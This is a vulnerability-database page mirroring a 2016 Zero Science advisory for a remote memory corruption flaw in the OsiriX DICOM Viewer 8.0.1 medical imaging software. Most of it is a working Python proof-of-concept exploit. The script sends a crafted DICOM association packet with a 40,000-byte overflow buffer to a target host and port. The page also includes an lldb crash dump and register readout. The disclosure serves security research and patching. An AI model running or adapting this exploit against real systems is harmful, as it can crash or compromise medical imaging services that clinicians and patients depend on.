Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption

🗓️ 16 Dec 2016 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 57 Views

OsiriX DICOM Viewer 8.0.1 Remote Memory Corruption Vulnerability from DCMTK Toolki

Code
`#!/usr/bin/env python  
# -*- coding: utf8 -*-  
#  
#  
# OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability  
#  
#  
# Vendor: Pixmeo Sarl  
# Product web page: http://www.osirix-viewer.com  
# Affected version: OsiriX 8.0.1  
#  
# Summary: With high performance and an intuitive interactive user interface, OsiriX MD is  
# the most widely used DICOM viewer in the world. It is the result of more than 10 years of  
# research and development in digital imaging. It fully supports the DICOM standard for an  
# easy integration in your workflow environment and an open platform for development of  
# processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive  
# innovative technique for 3D and 4D navigation and a complete integration with any PACS.  
# OsiriX MD supports 64-bit computing and multithreading for the best performances on the  
# most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.  
#  
# Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images  
# (".dcm" / ".DCM" extension) produced by equipment (MRI, CT, PET, PET-CT, ...).  
# Osirix is complementary to existing viewers, in particular to nuclear medicine viewers.  
#  
# Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that  
# are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL.  
# Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length  
# of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can  
# overflow the stack and the heap of the process when sending large array of bytes to the presentation  
# context item length segment of the DICOM standard, potentially resulting in remote code execution  
# and/or denial of service scenario.  
#  
# -------------------------------------------------------------------------------------  
#  
# (lldb)   
# Process 65202 stopped  
# * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1)  
# frame #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833  
# OsiriX Lite`parseAssociate:  
# -> 0x108978441 <+833>: movzbl (%r10), %eax  
# 0x108978445 <+837>: cmpl $0x40, %eax  
# 0x108978448 <+840>: movq -0x200(%rbp), %rcx  
# 0x10897844f <+847>: je 0x108978513 ; <+1043>  
# (lldb) bt  
# * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1)  
# * frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833  
# frame #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339  
# frame #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314  
# frame #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348  
# frame #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462  
# frame #5: 0x0000000102c5f28f OsiriX Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207  
# frame #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999  
# frame #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519  
# frame #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243  
# frame #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180  
# frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286  
# frame #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13  
# (lldb) register read  
# General Purpose Registers:  
# rax = 0x0000000000000103  
# rbx = 0x00000001044c18d8 OsiriX Lite`ECC_Normal  
# rcx = 0x00006100002e6200  
# rdx = 0x000000000001ad41  
# rdi = 0x00000001044c18d8 OsiriX Lite`ECC_Normal  
# rsi = 0x00006100002e6200  
# rbp = 0x0000700005a4a670  
# rsp = 0x0000700005a4a420  
# r8 = 0x0000000000000103  
# r9 = 0x00000000fb40cfc6  
# r10 = 0x00007fab8ac000a1  
# r11 = 0x0000000000000041  
# r12 = 0x0000700005a4a6b8  
# r13 = 0x00000001044c18f0 OsiriX Lite`EC_Normal  
# r14 = 0x00000001044c18d8 OsiriX Lite`ECC_Normal  
# r15 = 0x0000000000008014  
# rip = 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833  
# rflags = 0x0000000000010286  
# cs = 0x000000000000002b  
# fs = 0x0000000000000000  
# gs = 0x0000000000000000  
#  
# -------------------------------------------------------------------------------------  
#  
# Tested on: OS X 10.12.2 (Sierra)  
# OS X 10.12.1 (Sierra)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2016-5382  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php  
#  
# https://tools.ietf.org/html/rfc3240  
# https://github.com/commontk/DCMTK/commit/1b6bb76  
#  
# 29.11.2016  
#  
  
  
import sys, socket  
  
hello = ('\x01\x00\x00\x00\x80\x71\x00\x01\x00\x00\x4f\x52\x54\x48'  
'\x41\x4e\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4a\x4f'  
'\x58\x59\x50\x4f\x58\x59\x21\x00\x00\x00\x00\x00\x00\x00'  
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'  
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'  
'\x00\x00\x00\x00\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34'  
'\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e'  
'\x31\x20\x00\x80\x00')  
  
bye = ('\x50\x00\x00\x0c\x51\x00\x00\x04\x00\x00\x07\xde'  
'\x52\x00\x00\x00')  
  
buffer = '\x41\x42\x43\x44' * 10000  
  
if len(sys.argv) < 3:  
print '\nUsage: ' +sys.argv[0]+ ' <target> <port>'  
print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112\n'  
sys.exit(0)  
  
host = sys.argv[1]  
port = int(sys.argv[2])  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect = s.connect((host, port))  
s.settimeout(251)  
s.send(hello+buffer+bye)  
s.close  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Dec 2016 00:00Current
0.6Low risk
Vulners AI Score0.6
osirix mddicom viewerremote memory corruptiondcmtk toolkitvulnerabilitypixmeo sarlfda cleared
57